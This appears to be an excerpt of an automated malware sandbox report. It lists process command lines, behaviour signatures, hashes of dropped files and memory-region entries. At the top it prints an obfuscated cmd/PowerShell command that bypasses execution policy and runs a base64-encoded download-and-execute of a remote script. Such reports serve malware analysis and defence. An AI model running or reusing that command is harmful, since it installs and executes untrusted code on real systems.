    Command line: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
      Command line: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      Signatures: Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7645.exeMD5
63151e4f7c3972f18a23c0e9996e14ef
SHA15d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256
cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512
f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\7645.exe
MD5
63151e4f7c3972f18a23c0e9996e14ef
SHA1
5d041fde6433a8ff8fc78a69fca1fd4630e3f270
SHA256
cc28e327610e9deb6551c99a32a44fec86220f2840276474ded747580af850d3
SHA512
f08c402f0a966cbe89fae0b5f9aa8536d6313dada788486a4db422a042769713a2896753acd47223348349b9960b5cde9470cc862668e2cdb90a6fcc1b87c8ec
-
C:\Users\Admin\AppData\Local\Temp\RES8EEE.tmp
MD5
67007de5e538444640e6945cfe22c29b
SHA1
942f9db1a985bc64186acc6f668867147e43df91
SHA256
8f6a60e60a06dd5ccc8a96fdf06ff26dd906d2294973cf6f5e9703b8f7723d4f
SHA512
02df880e426df11d77f8edb12c7d26fdbd3091144e02527e06bf163825094974dce83712bdc4d3d67366c99002b09915368810013d33dfee72926da38a520e9d
-
C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1
MD5
f783019c5dc4a5477d1ffd4f9f512979
SHA1
37c8d1e5dd2ebce647c4e0a92f8598ebf2fdcc7b
SHA256
4c81fee866a87b2de6e10640fe094f0db29258014177e294ac94a819940f5348
SHA512
64d90352f4466f0097dd2c7ace8ccb155947dda8ae148c8c6ba1507a9e879247fab2eba452c812ba628a65de93cc096dabfcb23d2be4b525a92e5ef9e4b57d6a
-
C:\Users\Admin\AppData\Local\Temp\nwnnvqyb\nwnnvqyb.dll
MD5
6350299f1222819622112f190160b9fa
SHA1
034d8426c487c36e6f2b2662c1fd52cfa2e967c8
SHA256
ae302b0d18a6d65806dad1024a7c094a2f08266ba0d1b0a705dbd3f2742d5f26
SHA512
68087144be7ebc6aa6675bf22c3ac732d0e96df8fe278e3f5806b17506f00c4c0f64a9c015dfe117083c7a5b1795ab8ed9754554334d19fe0c55bb26497cdb8e
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA1
7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256
abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512
891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
\??\c:\Users\Admin\AppData\Local\Temp\nwnnvqyb\CSCEB3CB7ED157E4EF6836E44E436CC1C4F.TMP
MD5
ff4a8028dbae0f8baeaf722e98eb06ef
SHA1
b7b05b0057b71e9ed36df4c0009f9ef1dc82c16d
SHA256
9a062e40f059dbdb9a46f00f0b8654cfb7c9d0e81851617d47f0df35968f940d
SHA512
9b83177c8f0db8736e1ae336015d0830bf315dce11349fdb45888f65f2280201c9b93bc59336c1a3b90934eed677683b97651cd1ff2ca22d431d2b0f5d0da8a0
-
\??\c:\Users\Admin\AppData\Local\Temp\nwnnvqyb\nwnnvqyb.0.cs
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA1
2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256
e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512
53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
\??\c:\Users\Admin\AppData\Local\Temp\nwnnvqyb\nwnnvqyb.cmdline
MD5
72d905de423287d720c342d3c53af778
SHA1
d0aeba6e6ec51089024519a8bb1ed09a47f51648
SHA256
e08ffeed958ca11fa08c9208da6bd8c0f08d86c1c77ab2db9907e142c7883862
SHA512
8e788bf909f999086a760fbe956a66b24a88fa4daf1851da98c33539be921eaa6b58dd087ecdeb91c72053925c21fa058a21641b388f48419d18c606a5fa548a
-
\Windows\Branding\mediasrv.png
MD5
ac13d804585a74dc542db4ec94da39df
SHA1
8642ae2e04e492700caf41b43de9ef9d8b3c26f9
SHA256
84c41dc018689fcb2fc4240f1e0267a5ee82232e3bcd541f5f5bed4139cfcd55
SHA512
0ba869487fda38d398903df4235bd8f2d0f8fb774b559125ba278751a5a503adbb0557f9ea2fde5fecba4f1a33b71583be36fac0f6f8842cbee0bdd7ea2fb5bf
-
\Windows\Branding\mediasvc.png
MD5
9151c95451abb048a44f98d0afac8264
SHA1
22f447b210eb25c11be5a9c31f254f5f2bd50a78
SHA256
8082bfe8a9f63854d6317cf6ddc0c18c54140ee5d179a96bfe9900c90d994518
SHA512
728b140e68dcb6751cccb4d1046ac61f63e8db13d4f613b44e161d457f107acc11b3275167c7b4dff34a6d5966116ecb062f94713d0cf4f35b327d14ec7cbd13
-
memory/8-117-0x0000000000400000-0x0000000002BAF000-memory.dmp
Filesize
39.7MB
-
memory/8-116-0x00000000001E0000-0x00000000001E9000-memory.dmp
Filesize
36KB
-
memory/688-163-0x000002A5A9040000-0x000002A5A9041000-memory.dmp
Filesize
4KB
-
memory/688-130-0x000002A58C630000-0x000002A58C632000-memory.dmp
Filesize
8KB
-
memory/688-135-0x000002A58C630000-0x000002A58C632000-memory.dmp
Filesize
8KB
-
memory/688-136-0x000002A58C630000-0x000002A58C632000-memory.dmp
Filesize
8KB
-
memory/688-138-0x000002A58C630000-0x000002A58C632000-memory.dmp
Filesize
8KB
-
memory/688-137-0x000002A58C630000-0x000002A58C632000-memory.dmp
Filesize
8KB
-
memory/688-139-0x000002A5A86D0000-0x000002A5A86D1000-memory.dmp
Filesize
4KB
-
memory/688-133-0x000002A58C630000-0x000002A58C632000-memory.dmp
Filesize
8KB
-
memory/688-141-0x000002A58C630000-0x000002A58C632000-memory.dmp
Filesize
8KB
-
memory/688-145-0x000002A58E3F0000-0x000002A58E3F2000-memory.dmp
Filesize
8KB
-
memory/688-146-0x000002A58E3F3000-0x000002A58E3F5000-memory.dmp
Filesize
8KB
-
memory/688-147-0x000002A58E3F6000-0x000002A58E3F8000-memory.dmp
Filesize
8KB
-
memory/688-162-0x000002A58E3F8000-0x000002A58E3F9000-memory.dmp
Filesize
4KB
-
memory/688-161-0x000002A5A8CB0000-0x000002A5A8CB1000-memory.dmp
Filesize
4KB
-
memory/688-170-0x000002A58C630000-0x000002A58C632000-memory.dmp
Filesize
8KB
-
memory/688-128-0x0000000000000000-mapping.dmp
-
memory/688-132-0x000002A58C630000-0x000002A58C632000-memory.dmp
Filesize
8KB
-
memory/688-131-0x000002A58C630000-0x000002A58C632000-memory.dmp
Filesize
8KB
-
memory/688-155-0x000002A5A8660000-0x000002A5A8661000-memory.dmp
Filesize
4KB
-
memory/688-134-0x000002A5A8520000-0x000002A5A8521000-memory.dmp
Filesize
4KB
-
memory/688-129-0x000002A58C630000-0x000002A58C632000-memory.dmp
Filesize
8KB
-
memory/820-259-0x0000000000000000-mapping.dmp
-
memory/820-309-0x000001F569AB8000-0x000001F569ABA000-memory.dmp
Filesize
8KB
-
memory/820-280-0x000001F569AB3000-0x000001F569AB5000-memory.dmp
Filesize
8KB
-
memory/820-279-0x000001F569AB0000-0x000001F569AB2000-memory.dmp
Filesize
8KB
-
memory/820-278-0x000001F569AB6000-0x000001F569AB8000-memory.dmp
Filesize
8KB
-
memory/844-125-0x000001B971E13000-0x000001B971E15000-memory.dmp
Filesize
8KB
-
memory/844-127-0x000001B971E16000-0x000001B971E17000-memory.dmp
Filesize
4KB
-
memory/844-122-0x000001B972230000-0x000001B97262F000-memory.dmp
Filesize
4.0MB
-
memory/844-119-0x0000000000000000-mapping.dmp
-
memory/844-124-0x000001B971E10000-0x000001B971E12000-memory.dmp
Filesize
8KB
-
memory/844-126-0x000001B971E15000-0x000001B971E16000-memory.dmp
Filesize
4KB
-
memory/1008-375-0x0000000000000000-mapping.dmp
-
memory/1056-382-0x0000000000000000-mapping.dmp
-
memory/1556-320-0x0000000000000000-mapping.dmp
-
memory/1664-364-0x0000000000000000-mapping.dmp
-
memory/1680-383-0x0000000000000000-mapping.dmp
-
memory/1724-373-0x0000000000000000-mapping.dmp
-
memory/1852-386-0x0000000000000000-mapping.dmp
-
memory/1900-365-0x0000000000000000-mapping.dmp
-
memory/1968-458-0x0000000000000000-mapping.dmp
-
memory/1972-181-0x0000020580050000-0x0000020580052000-memory.dmp
Filesize
8KB
-
memory/1972-175-0x0000020580050000-0x0000020580052000-memory.dmp
Filesize
8KB
-
memory/1972-218-0x0000020598458000-0x000002059845A000-memory.dmp
Filesize
8KB
-
memory/1972-171-0x0000000000000000-mapping.dmp
-
memory/1972-172-0x0000020580050000-0x0000020580052000-memory.dmp
Filesize
8KB
-
memory/1972-173-0x0000020580050000-0x0000020580052000-memory.dmp
Filesize
8KB
-
memory/1972-203-0x0000020598456000-0x0000020598458000-memory.dmp
Filesize
8KB
-
memory/1972-174-0x0000020580050000-0x0000020580052000-memory.dmp
Filesize
8KB
-
memory/1972-185-0x0000020580050000-0x0000020580052000-memory.dmp
Filesize
8KB
-
memory/1972-184-0x0000020598453000-0x0000020598455000-memory.dmp
Filesize
8KB
-
memory/1972-183-0x0000020598450000-0x0000020598452000-memory.dmp
Filesize
8KB
-
memory/1972-180-0x0000020580050000-0x0000020580052000-memory.dmp
Filesize
8KB
-
memory/1972-176-0x0000020580050000-0x0000020580052000-memory.dmp
Filesize
8KB
-
memory/1972-179-0x0000020580050000-0x0000020580052000-memory.dmp
Filesize
8KB
-
memory/1972-178-0x0000020580050000-0x0000020580052000-memory.dmp
Filesize
8KB
-
memory/2084-372-0x0000000000000000-mapping.dmp
-
memory/2232-374-0x0000000000000000-mapping.dmp
-
memory/2236-384-0x0000000000000000-mapping.dmp
-
memory/2240-363-0x0000000000000000-mapping.dmp
-
memory/2244-380-0x0000000000000000-mapping.dmp
-
memory/2380-358-0x0000000000000000-mapping.dmp
-
memory/2468-368-0x0000000000000000-mapping.dmp
-
memory/2556-151-0x0000000000000000-mapping.dmp
-
memory/2568-118-0x0000000001140000-0x0000000001156000-memory.dmp
Filesize
88KB
-
memory/2588-379-0x0000000000000000-mapping.dmp
-
memory/2736-254-0x0000021357476000-0x0000021357478000-memory.dmp
Filesize
8KB
-
memory/2736-252-0x0000021357470000-0x0000021357472000-memory.dmp
Filesize
8KB
-
memory/2736-277-0x0000021357478000-0x000002135747A000-memory.dmp
Filesize
8KB
-
memory/2736-253-0x0000021357473000-0x0000021357475000-memory.dmp
Filesize
8KB
-
memory/2736-217-0x0000000000000000-mapping.dmp
-
memory/2868-362-0x0000000000000000-mapping.dmp
-
memory/3044-319-0x0000000000000000-mapping.dmp
-
memory/3144-385-0x0000000000000000-mapping.dmp
-
memory/3236-377-0x0000000000000000-mapping.dmp
-
memory/3288-366-0x0000000000000000-mapping.dmp
-
memory/3292-376-0x0000000000000000-mapping.dmp
-
memory/3488-148-0x0000000000000000-mapping.dmp
-
memory/3488-387-0x0000000000000000-mapping.dmp
-
memory/3488-399-0x000001C7604D0000-0x000001C7604D2000-memory.dmp
Filesize
8KB
-
memory/3488-400-0x000001C7604D3000-0x000001C7604D5000-memory.dmp
Filesize
8KB
-
memory/3488-405-0x000001C7604D6000-0x000001C7604D8000-memory.dmp
Filesize
8KB
-
memory/3488-419-0x000001C7604D8000-0x000001C7604D9000-memory.dmp
Filesize
4KB
-
memory/3612-367-0x0000000000000000-mapping.dmp
-
memory/3688-457-0x0000000000000000-mapping.dmp
-
memory/3708-321-0x0000000000000000-mapping.dmp
-
memory/3804-359-0x0000000000000000-mapping.dmp
-
memory/3828-381-0x0000000000000000-mapping.dmp
-
memory/3864-369-0x0000000000000000-mapping.dmp
-
memory/4008-378-0x0000000000000000-mapping.dmp